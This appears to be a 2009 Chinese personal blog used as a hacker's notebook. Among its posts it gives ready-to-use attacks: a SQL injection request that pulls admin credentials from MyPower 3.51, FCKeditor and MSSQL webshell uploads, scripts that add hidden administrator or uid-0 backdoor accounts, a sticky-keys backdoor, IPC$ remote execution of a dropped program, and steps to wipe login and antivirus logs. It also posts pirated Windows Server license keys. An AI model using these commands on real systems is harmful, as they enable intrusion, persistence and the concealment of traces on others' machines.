# /usr/sbin/setsebool httpd_can_network_connect 1 OR # /usr/sbin/setsebool httpd_can_network_connect true
2009年10月18日
Linux服务器程序访问网络设置
貌似服务器版本的不允许程序访问自己的IP,但假如有时候要用到Apache的Rewrite,Rewrite到本机的话,必须让自己能访问自己。
2009年8月31日
2009年8月20日
MY动力(MyPower)3.51注入漏洞手动利用
c:\>nc www.site.com 80<send.txt
//send.txt
POST /Article_Print.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Microsoft URL Control - 6.01.9782
Host: www.site.com
Content-Length: 277
Cache-Control: no-cache
ArticleID=1000%20union%20(select%20top%201%201,1,'user:'%2busername%2bchr(124),'pass:'%2bpassword%2bchr(124),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20(select%20top%201%20username,password%20from%20admin%20order%20by%20username)%20order%20by%20username%20desc)
相关工具:动力文章v3.51注入程序(http://www.3800hk.com/Soft/zhly/18573.html)
查admin表记录数量,POST如下
ArticleID=1000%20union%20(select%20top%201%201,1,1,count(*),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20admin)
2009年8月12日
[转载]linux入侵常用命令
给自己省事了,呵呵
cat /etc/shadow 查看用户密码需要root权限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息
ifconfig 查看本机ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反弹的shell中使用可以直观显示命令
bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成
bash#。
系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。
echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看运行服务
lsb_release -a 查看系统版本
重启ssh服务 :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
将其改为
PasswordAuthentication yes
远程ssh才可登录
否则显示Access denied
其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod 777 /etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp /bin/bash /sbin/nologin
然后su的时候su - bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
还可以这样
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last记录 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的
2009年8月3日
2009年7月29日
取消windows 2003 关机原因的提示
开组策略编辑器(gpedit.msc)→计算机配置→管理模板→系统,将显示“关闭事件跟踪程序”由默认的“未配置”改为“已禁用”。
个人用或者虚拟机测试环境中的2K3下推荐关闭,要不很烦人.....
如果组策略显示不全,解决办法:
1.进入组策略(Gpedit.msc) 2.右击"管理模板"' 3.选择"添加删除模板" 4.点击"添加"按钮 5.Ctrl+A全选模板 6.确定
2009年7月24日
2009年7月23日
AIX查看硬件配置
| AIX查看硬件配置 | |
 | |
|
2009年7月22日
2009年7月11日
SQL Tools上传文件原理
抓包看了下:
Exec master..xp_cmdshell 'textcopy /s 127.0.0.1 /u "sa" /p "123456" /d Master /t mytable /c Files /W True /F c:\test.txt /o'
mytable是有Image字段的表。
他NND,既然是通过xp_cmshell和textcopy,那就没什么利用价值了。
2009年7月8日
常见Windows键盘按键虚拟码
有时候写小程序用的到....比如,shift后门的快捷键,呵呵
键盘常用ASCII码 |
2009年6月3日
2009年6月2日
Symantec杀毒日志路径
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Logs
清除脚印的时候可以只删自己造成的几条。
2009年5月18日
Fckeditor上传webshell
Fckeditor目录结构
fckeditor\editor\filemanager\browser\default\browser.html
fckeditor\editor\filemanager\connectors\asp\connector.asp
老版本利用
http://www.site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=../../connectors/aspx/connector.aspx
Type=all后可以直接传webshell
较新版本
http://www.site.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
Type=Image(这里区分大小写),然后结合IIS6后缀解析BUG传webshell
由于要验证图片文件类型,要能预览出的图片,所以要用copy把文件加到一起
copy s.gif /b + 1.asp /a 2.jpg
还可以尝试建\1.asp\这样的文件夹
上传目录:
上传目录在fckeditor\editor\filemanager\connectors\asp\config.asp里面配置
一般可以在站点根目录下的\userfiles里面找找。
2009年5月14日
注册表获取Windows自动登陆用户名密码
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
DefaultuserName=自动登陆的帐户
Defaultpassword=密码
Defaultpassword=密码
里面还保存了其他很多和登陆有关的信息。
2009年5月12日
2009年5月9日
Windows Server 2003 R2 with SP2 英文版合集(8IN1)
下载地址:
这个ISO不错,8合1,很强大,相关的key说明文件也很详细。
我本来把Key说明文件记录到了TXT准备添加到ISO里面刻盘的,结果发现添加进去后生成的新ISO居然有5G多......我估计他做这个ISO的时候,用了啥牛B东西,重复文件只保留一份,很好很强大。
为了防止以后安装的时候找不到key,所以我把key记到这.....
下面内容转自zt169.com
说明:
1.系由官方集成SP2的母盘改制,与手动集成SP2相比,少量文件有出入,官方集成应更为可靠
2.序列号
ENT SP2 OEM: TPPJH-FG9MV-KQPXW-HVHKJ-6G728 (dell hp ibm通用)
STD SP2 OEM: KM63V-GW6H6-WY4BP-HMCK4-G7CKJ (dell hp ibm通用)
R2 ENT OEM: 缺
R2 STD OEM: G7P8D-4XR7R-2XR3W-6JQPW-FVG6W (dell hp ibm通用)
VLP(VOL): VMVGV-Q3697-CQ872-D3YBJ-4Y6BB (ent std通用)
R2 VLP(VOL): GXJ7R-PDJKW-7TMRK-VT6JC-G4XWG (ent std通用)
3.各OEM版都可以免激活,SLP如下
dell: Dell System
hp: Hewlett-Packard
ibm: IBM CORPORATION
4.R2属于可选,如用R2序列号安装,得到就是Windows Server 2003 R2 with SP2
如用一般序列号安装,得到Windows Server 2003 with SP2
日后仍可手动安装R2部分,届时需要输入R2序列号
5.1cd 700MB已经不够用了,故将R2部分放到了一起,796MB
MD5:
52bfcfeeed508953be1a02bf2cf6d33b EN_WS03SP2.ISO
Windows Server 2003 R2 with SP2 英文版合集
共八个版本
[A] Windows Server 2003 R2 Enterprise Edition with SP2, DELL OEM - English
[B] Windows Server 2003 R2 Enterprise Edition with SP2, HP OEM - English
[C] Windows Server 2003 R2 Enterprise Edition with SP2, IBM OEM - English
[D] Windows Server 2003 R2 Enterprise Edition with SP2, VLP - English
[E] Windows Server 2003 R2 Standard Edition with SP2, DELL OEM - English
[F] Windows Server 2003 R2 Standard Edition with SP2, HP OEM - English
[G] Windows Server 2003 R2 Standard Edition with SP2, IBM OEM - English
[H] Windows Server 2003 R2 Standard Edition with SP2, VLP - English
2009年4月28日
Windows一些常用命令&程序
转自http://www.cnscn.org/htm_data/571/0808/15947.html
有些感觉还是挺有用,先留着。
有些感觉还是挺有用,先留着。
gpedit.msc-------------------------组策略
sndrec32-------------------------录音机
nslookup-------------------------ip地址侦测器
explorer-------------------------打开资源管理器
logoff--------------------------注销命令
tsshutdn-------------------------60秒倒计时关机命令
lusrmgr.msc-------------------------本机用户和组
services.msc-------------------------本地服务设置
oobe/msoobe /a----------------------检查xp是否激活
notepad--------------------------打开记事本
cleanmgr-------------------------垃圾整理
net start messenger-----------------开始信使服务
compmgmt.msc-------------------------计算机管理0
net stop messenger-----------------停止信使服务
conf-------------------------启动
dvdplay-------------------------dvd播放器
charmap-------------------------启动字符映射表
diskmgmt.msc-------------------------磁盘管理实用程序
calc-------------------------启动计算器
dfrg.msc-------------------------磁盘碎片整理程序
devmgmt.msc--- ----------------------设备管理器
regsvr32 /u *.dll-------------------停止dll文件运行
drwtsn32------ -------------------系统医生
rononce -p ------------------------15秒关机
dxdiag-------------------------检查directx信息
regedt32-------------------------注册表编辑器
msconfig.exe-------------------------系统配置实用程序
rsop.msc-------------------------组策略结果集
mem.exe-------------------------显示内存使用情况
regedit.exe-------------------------注册表
winchat-------------------------xp自带局域网聊天
progman-------------------------程序管理器
winmsd-------------------------系统信息
perfmon.msc-------------------------计算机性能监测程序
winver-------------------------检查windows版本
sfc /scannow-----------------------扫描错误并复原
winver-------------------------检查windows版本
wmimgmt.msc-------------------------打开windows管理体系结构
wupdmgr-------------------------windows更新程序
w脚本---------------------------windows脚本宿主设置
write-------------------------写字板
winmsd-------------------------系统信息
wiaacmgr-------------------------扫描仪和照相机向导
winchat-------------------------xp自带局域网聊天
mem.exe-------------------------显示内存使用情况
msconfig.exe-------------------------系统配置实用程序
mplayer2-------------------------简易
mspaint-------------------------画图板
mstsc-------------------------远程桌面连接
mplayer2-------------------------媒体播放机
magnify-------------------------放大镜实用程序
mmc-------------------------打开控制台
mobsync-------------------------同步命令
dxdiag-------------------------检查directx信息
drwtsn32------------------------- 系统医生
devmgmt.msc--- ----------------------设备管理器
dfrg.msc-------------------------磁盘碎片整理程序
diskmgmt.msc-------------------------磁盘管理实用程序
dcomcnfg-------------------------打开系统组件服务
ddeshare-------------------------打开dde共享设置
dvdplay-------------------------dvd播放器
net stop messenger-----------------停止信使服务
net start messenger-----------------开始信使服务
ntbackup-------------------------系统备份和还原
narrator-------------------------屏幕"讲述人"
nyessmgr.msc-------------------------移动存储管理器
nyessoprq.msc-------------------------移动存储管理员操作请求
netstat -an------------------------(tc)命令检查接口
syncapp-------------------------创建一个公文包
sysedit-------------------------系统配置编辑器
sigverif-------------------------文件签名验证程序
sndrec32-------------------------录音机
shrpubw-------------------------创建共享文件夹
secpol.msc-----====================本地安全策略
syskey---------================系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
sndvol32-------==================音量控制程序
sfc.exe--------=================系统文件检查器
tsshutdn-------==================60秒倒计时关机命令
tourstart------===================xp简介(安装完成后出现的漫游xp程序)
taskmgr--------=================任务管理器
eventvwr-------==================事件查看器
eudcedit-------==================造字程序
packager-------==================对象包装程序
perfmon.msc----=====================计算机性能监测程序
progman--------=================程序管理器
regedit.exe----=====================注册表
rsop.msc-------==================组策略结果集
regedt32-------==================注册表编辑器
rononce -p ----====================15秒关机
regsvr32 /u *.dll----===============停止dll文件运行
regsvr32 /u zipfldr.dll------=====取消zip支持
chkdsk.exe-----====================chkdsk磁盘检查
ceryesgr.msc----=====================证书管理实用程序
charmap--------=================启动字符映射表
cliconfg-------==================sql server 客户端网络实用程序
clipbrd--------=================剪贴板查看器
conf-----------==============启动
compmgmt.msc---======================计算机管理
cleanmgr-------==================垃圾整理
ciadv.msc------===================索引服务程序
osk------------=============打开屏幕键盘
odbcad32-------==================odbc数据源管理器
oobe/msoobe /a----==================检查xp是否激活
lusrmgr.msc----=====================本机用户和组
logoff---------================注销命令
iexpress-------==================木马捆绑工具,系统自带
nslookup-------==================ip地址侦测器
fsmgmt.msc-----====================共享文件夹管理器
utilman--------=================辅助工具管理器
汇编代码中构造字符串之顺序问题
一般用于ShellCode编写等。
主要是构造字符串时顺序问题很烦人,贴两个例子上来,方便以后用到的时候查询。
以构造字符串"ABCD1234零魂"为例
PUSH EBP
MOV EBP,ESP
SUB ESP,0AH
MOV DWORD PTR [EBP-10H],0x44434241 //0x DCBA
MOV DWORD PTR [EBP-0CH],0x34333231 //0x 4321
MOV DWORD PTR [EBP-08H],0xEABBE3C1 //0x 反序0xC1E3BBEA就是"零魂"
MOV DWORD PTR [EBP-04H],0x0 //字符串结束
LEA EAX,[EBP-10H] //EAX=ADDR OF "ABCD1234零魂"
PUSH EBP
MOV EBP,ESP
PUSH 0xEABBE3C1//0x 反序0xC1E3BBEA就是"零魂"
PUSH 0x34333231//0x 4321
PUSH 0x44434241//0x DCBA
MOV EAX,ESP //EAX=ADDR OF "ABCD1234零魂"
主要是构造字符串时顺序问题很烦人,贴两个例子上来,方便以后用到的时候查询。
以构造字符串"ABCD1234零魂"为例
PUSH EBP
MOV EBP,ESP
SUB ESP,0AH
MOV DWORD PTR [EBP-10H],0x44434241 //0x DCBA
MOV DWORD PTR [EBP-0CH],0x34333231 //0x 4321
MOV DWORD PTR [EBP-08H],0xEABBE3C1 //0x 反序0xC1E3BBEA就是"零魂"
MOV DWORD PTR [EBP-04H],0x0 //字符串结束
LEA EAX,[EBP-10H] //EAX=ADDR OF "ABCD1234零魂"
PUSH EBP
MOV EBP,ESP
PUSH 0xEABBE3C1//0x 反序0xC1E3BBEA就是"零魂"
PUSH 0x34333231//0x 4321
PUSH 0x44434241//0x DCBA
MOV EAX,ESP //EAX=ADDR OF "ABCD1234零魂"
2009年4月26日
2009年4月22日
MSSQL SA用sp_makewebtask写一句话
exec sp_makewebtask 'f:\wwwroot\shell1.asp','select''<% execute(request("#"))%>'''
暂时还未测试..
暂时还未测试..
2009年4月16日
2009年4月15日
无net.exe添加账户的VBS
//下面内容保存成.VBS文件直接双击运行即可
//user:zerosoul
//pass:12345678
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","zerosoul")
od.SetPassword "12345678"
od.SetInfo
Set of=GetObject(os&"/zerosoul",user)
oe.add os&"/zerosoul"
//user:zerosoul
//pass:12345678
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","zerosoul")
od.SetPassword "12345678"
od.SetInfo
Set of=GetObject(os&"/zerosoul",user)
oe.add os&"/zerosoul"
2009年4月13日
Cmd粘滞键后门批处理
这个批处理手动写过太多遍了.....每次使用前都要写一遍,虽然简单,但写的有点烦了,所以也贴上来,以后直接copy.....
del /q /f %systemroot%\system32\dllcache\sethc.exe
del /q /f %systemroot%\system32\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
del /q /f %systemroot%\system32\dllcache\sethc.exe
del /q /f %systemroot%\system32\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
2009年4月8日
2009年4月3日
2003不重启命令行开3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
终端连接超限情况下强制进入:
mstsc /console /v:220.215.88.99
2009年3月31日
MS SQL Server注入语句
执行CMD命令
exec master..xp_cmdshell"net1 user zerosoul 123456 /add"
(sp_oacreate依赖odsole70.dll)
沙盘模式执行
开启沙盘
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2005开启openrowset
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user zerosoul$ 123456 /add")')
恢复xp_cmdshell(依赖xpsql70.dll或者xplog70.dll)
xp_cmdshell被禁用的情况下恢复
xp_cmdshell被删的情况下恢复
sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
找不到函数情况下恢复
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'
列目录(依赖xpstar.dll)
exec xp_dirtree 'D:\Microsoft SQL Server\MSSQL\',1,1;(注意带参数1,1,否则...会比较惨= =#)
exec xp_subdirs 'c:\'(这个只能列出目录,不能列文件)
查看扩展存储过程
EXEC sp_helpextendedproc;
2009年3月28日
关于HTTP头和访客IP
HTTP_CLIENT_IP:22.22.22.2
HTTP_X_FORWARDED_FOR:33.33.33.33
HTTP_REMOTE_ADDR:127.0.0.1
HTTP_X_FORWARDED_FOR:33.33.33.33
HTTP_REMOTE_ADDR:127.0.0.1
经过我亲测,只有REMOTE_ADDR不能伪造。
流行的判断IP的PHP代码:
function get_ip()
{
if(getenv('HTTP_CLIENT_IP')) {
$gb_ip = getenv('HTTP_CLIENT_IP');
}
elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$gb_ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif(getenv('REMOTE_ADDR')) {
$gb_ip = getenv('REMOTE_ADDR');
}
else {
$gb_ip = $_SERVER['REMOTE_ADDR'];
}
return $gb_ip;
}
2009年3月26日
Linux 一些配置文件的位置
主要以Debian为例
grub配置文件menu.lst
/boot/grub/menu.lst
sudo user列表
/etc/sudoers
/etc/sudoers
源列表-sources.list
/etc/apt/sources.list
语言配置文件
/etc/sysconfig/i18n
网卡配置文件
debain:/etc/sysconfig/network-scripts目录下,ifcfg-eth0,ifcfg-eth1文件分别是不同网卡的IP地址配置文件
ubuntu:/etc/network/interfaces
apt-get 命令参数详解
apt-cache search package 搜索包
apt-cache show package 获取包的相关信息,如说明、大小、版本等
sudo apt-get install package 安装包
sudo apt-get install package - - reinstall 重新安装包
sudo apt-get -f install 修复安装"-f = ——fix-missing"
sudo apt-get remove package 删除包
sudo apt-get remove package - - purge 删除包,包括删除配置文件等
sudo apt-get update 更新源
sudo apt-get upgrade 更新已安装的包
sudo apt-get dist-upgrade 升级系统
sudo apt-get dselect-upgrade 使用 dselect 升级
apt-cache depends package 了解使用依赖
apt-cache rdepends package 是查看该包被哪些包依赖
sudo apt-get build-dep package 安装相关的编译环境
apt-get source package 下载该包的源代码
sudo apt-get clean && sudo apt-get autoclean 清理无用的包
sudo apt-get check 检查是否有损坏的依赖
2009年3月25日
一些Linux命令
查看用户(这方法有点...):
升极核心:apt-get install kernel-image-2.6.7-1-686
安装中文支持:apt-get install locales
安装主题:apt-get install gdm-themes
中文字库:apt-get install xfonts-intl-chinese
fcitx输入:apt-get install fcitx
安装浏览器:apt-get insatll mozilla-firefox flashplugin nonfree
调整分辨率:xrandr gtf 1024*768 100
中文支持:apt-get install zhcon
x-window:apt-get install x-window-system-core
apt-get install gnome-core
基础设定:base-congfige
查看分区:fdisk -L /dev/hda(sda)
装载ntfs分区:mount -t NTFS /dev/sda6 /mnt/2003
目录打包:tar -cvf 包名 目录
tar -zcvf 压缩打包
查看系统启动时运行的程序: #rcconf
查看cpu信息: more /proc/cppuinfo
配置中文: dpkg -reconfigure locales
安装中文字体和扶持 :
apt-get install ttf-arphic-bkaioompttf-arphic-bsmioolp xfonts -instl-chinese xcin
装载fat分区: mount -t vfat /dev/hda10 music
设置proxy,router ,dns
/etc/network/interfaces
/etc/resolv.conf
cat /etc/passwd | cut -f 1 -d:
终端下查找文件命令
find / -name bash
(假如从根目录/开始查找bash文件的话。)
(假如从根目录/开始查找bash文件的话。)
查看内核版本号
uname -a
less /proc/version
查看发行版本
cat /etc/*release
cat /etc/issue
lsb_release -a
查看当前用户信息
id
查找程序路径(gcc为例)
which gcc
创建文件链接(快捷方式)
ln -s /usr/bin/proc /home/zerosoul/Desktop/proc
重启X
Ctrl+Alt+BackSpace sudo /etc/init.d/gdm force-reload sudo /etc/init.d/kdm force-reload 结束进程 先ps -A | grep nc查看进程PID,以nc为例,假如结果是1394 然后kill 1394(nc进程的PID) 或者killall nc,结束所有nc进程 user权限查看IP /sbin/ifconfig 因为/sbin目录下的所有程序只给了root用户环境变量 |
查看用户所在组
groups
cat /etc/group
查看文件权限属性
ls -l /bin/bash
(以bash为例)
查看文件大小时间等属性
ls -lh /bin/bash
(以bash为例)
下面这些转自:
平台:debian
升极核心:apt-get install kernel-image-2.6.7-1-686
安装中文支持:apt-get install locales
安装主题:apt-get install gdm-themes
中文字库:apt-get install xfonts-intl-chinese
fcitx输入:apt-get install fcitx
安装浏览器:apt-get insatll mozilla-firefox flashplugin nonfree
调整分辨率:xrandr gtf 1024*768 100
中文支持:apt-get install zhcon
x-window:apt-get install x-window-system-core
apt-get install gnome-core
基础设定:base-congfige
查看分区:fdisk -L /dev/hda(sda)
装载ntfs分区:mount -t NTFS /dev/sda6 /mnt/2003
目录打包:tar -cvf 包名 目录
tar -zcvf 压缩打包
查看系统启动时运行的程序: #rcconf
查看cpu信息: more /proc/cppuinfo
配置中文: dpkg -reconfigure locales
安装中文字体和扶持 :
apt-get install ttf-arphic-bkaioompttf-arphic-bsmioolp xfonts -instl-chinese xcin
装载fat分区: mount -t vfat /dev/hda10 music
设置proxy,router ,dns
/etc/network/interfaces
/etc/resolv.conf
待续......
2009年3月24日
VIM常用命令列表
转自:http://blog.csdn.net/AbnerChai/
移动光标
上:k nk:向上移动n行 9999k或gg可以移到第一行 G移到最后一行
下:j nj:向下移动n行
左:h nh:向左移动n列
右:l nl:向右移动n列
w:光标以单词向前移动 nw:光标向前移动n个单词 光标到单词的第一个字母上
b:与w相反
e: 光标以单词向前移动 ne:光标向前移动n个单词 光标到单词的最后一个字母上
ge:与e相反
$:移动光标到行尾 n$:移动到第n行的行尾
0(Num):移动光标到行首
^:移动光标到行首第一个非空字符上去
f:移动光标到当前行的字符a上,nf移动光标到当前行的第n个a字符上
F:相反
%:移动到与制匹配的括号上去(),{},[],<>等。
nG:移动到第n行上 G:到最后一行
CTRL+G 得到当前光标在文件中的位置
翻页:
向前翻页:CTRL+F
向下移动半屏:CTRL+G
向后翻页:CTRL+B
存盘:
:q! :不存盘退出
:e! :放弃修改文件内容,重新载入该文件编辑
:wq :存盘退出
删除:
dw:删除一个单词,需将光标移到单词的第一个字母上,按dw,如果光标在单词任意位置,用daw
dnw:删除n个单词
dne:也可,只是删除到单词尾
dnl:向右删除n个字母
dnh:向左删除n个字母
dnj:向下删除n行
dnk:向上删除n行
d$:删除当前光标到改行的行尾的字母
dd:删除一行
cnw[word]:将n个word改变为word
cc:改变整行
C$:改变到行尾
J: 删除换行符,将光标移到改行,按shift+j删除行尾的换行符,下一行接上来了.
撤销:
u: 撤销前一次的操作
shif+u(U):撤销对该行的所有操作。
:set showmode :设置显示工作模式
o:在当前行的下面另起一行
O(shift+o):在当前行的上面另起一行
nk或nj:光标向上或向下移n行,n为数字
an!【ESC】:在行后面加n个感叹号(!)
nx:执行n次x(删除)操作
ZZ:保存当前文档并退出VIM
:help :查看帮助文档,在这之中,按CTRL+] 进入超连接,按CTRL+O 返回。
:help subject :看某一主题的帮助,ZZ 退出帮助
:set number / set nonumber :显示/不显示行号
:set ruler /set noruler:显示/不显示标尺
/pattern 正方向搜索一个字符模式
?pattern 反方向搜索一个字符模式
然后按n 继续向下找
把光标放到某个单词上面,然后按×号键,表示查找这个单词
查找整个单词:/\
:set hlsearch 高亮显示查找到的单词
:set nohlsearch 关闭改功能
m[a-z]:在文中做标记,标记号可为a-z的26个字母,用`a可以移动到标记a处
查找替换:
way1:
/【word】 :查找某个word
cw【newword】:替换为新word
n: 继续查找
.: 执行替换
r:替换当前字符
nr字符:替换当前n个字符
way2:
:s/string1/string2/g:在一行中将string1替换为string2,g表示执行 用c表示需要确认
:num1,num2 s/string1/string2/g:在行num1至num2中间将string1替换为string2
:1,$ s/string1/string2/g:在全文中将string1替换为string2
v:进入visual 模式
【ESC】退出
V:shift+v 进入行的visual 模式
CTRL+V:进如块操作模式用o和O改变选择的边的大小。
粘贴:
p,这是粘贴用x或d删除的文本
复制:
ynw:复制n个单词
yy:复制一行
ynl:复制n个字符
y$:复制当前光标至行尾处
nyy:拷贝n行
完了用p粘贴
:split:分割一个窗口
:split file.c :为另一个文件file.c分隔窗口
:nsplit file.c: 为另一个文件file.c分隔窗口,并指定其行数
CTRL+W在窗口中切换
:close:关闭当前窗口
在所有行插入相同的内容如include,操作方法如下: 将光标移到开始插入的位置,按CTRL+V进入VISUAL模式,选择好模块后 按I(shift+i),后插入要插入的文本,按[ESC]完成。
:read file.c 将文件file.c的内容插入到当前光标所在的下面
:0read file.c 将文件file.c的内容插入到当前文件的开始处(第0行)
:nread file.c 将文件file.c的内容插入到当前文件的第n行后面
:read !cmd :将外部命令cmd的输出插如到当前光标所在的下面
:n1,n2 write temp.c 将本文件中的n1,到n2行写入temp.c这个文件中去
CTRL+L刷新屏幕
shift + < 左移一行 shift + > 右移一行
u: undo
CTRL+R: re-do
J: 合并一行
CTRL+p 自动完成功能
CTRL+g 查看当前文件全路径
q[a-z] 开始记录但前开始的操作为宏,名称可为【a-z】,然后用q终止录制宏。
用reg显示当前定义的所有的宏,用@[a-z]来在当前光标处执行宏[a-z].
经典IPC$入侵命令
IPC入侵本来大家都以为要慢慢淡出了(我开始也这么以为.....),但随着慢慢深入,发现内网渗透的时候还是少不了它,呵呵。
由于IPC这东西年代有点久远了,命令早已经没那么熟悉了,所以还是帖网上,以备查询。
注意如果对方用的是12小时的时钟,如果是下午一定要转换成24小时的时间来运行。
net use \\192.168.0.1\IPC$ "passwd" /user:"admintitrator"
copy mm.exe \\192.168.0.1\c$
net time \\192.168.0.1
at \\192.168.0.1 11:05 c:\mm.exe
(假如net time 返回的是 11:04)
net time \\192.168.0.1
net use \\192.168.0.1\IPC$ /del
查看对方机器计划任务
at \\192.168.0.1
完了以后别忘了删除多余的或者写错了的计划任务
at \\192.168.0.1 /delete
或者
at 1 \\192.168.0.1 /delete(1这里指的是对应的计划任务ID)
2009年3月23日
域内网中的一些命令,有些可用于内网渗透
下面的命令不需要在域控制器上也可运行
查看同一域/工作组的计算机列表
net view /domain
查看域/工作组列表
net view /domain:Secwing
查看Secwing域中计算机列表
net group /domain
查看所在域的组
net user /domain
查看所在域用户
net user /domain zerosoul 12345678
修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限
net localgroup administrators SECWING\zerosoul /add
域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行
下面的命令只能用于域控制器:
net group "Domain controllers"
查看域控制器(如果有多台)
net group
查看域的组
net group "domain admins"
查看域管理员
net group "domain users"
查看域管理员
PS:打开配置域控制器向导的命令
dcpromo
域Users组用户添加到本地Administrators组
以本地管理员用户登陆本机,或者以域管理员用户在本机登陆域后,运行下列命令:
SECWING是所在域
zerosoul是域用户
PS:打开配置域控制器向导的命令
dcpromo
2009年3月22日
2009年3月21日
ShellCode
两组对应的ASM代码。
ASM1:
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov [ebp-08h],63h
mov [ebp-07h],6Dh
mov [ebp-06h],64h
mov [ebp-05h],2Eh
mov [ebp-04h],65h
mov [ebp-03h],78h
mov [ebp-02h],65h
lea eax,[ebp-08h]
push eax
mov edx,0x77bf93c7
call edx
leave //==mov esp,ebp + pop ebp
ASM2:
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],'e'
mov byte ptr [ebp-07h],'c'
mov byte ptr [ebp-06h],'h'
mov byte ptr [ebp-05h],'o'
mov byte ptr [ebp-04h],' '
mov byte ptr [ebp-03h],'x'
mov byte ptr [ebp-02h],'e'
lea eax,[ebp-08h]
push eax
mov eax,0x77bf93c7
call eax
add esp,5ch
pop ebp
2009年3月16日
命令行查看3389端口
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2009年3月11日
2009年3月10日
订阅:
博文 (Atom)
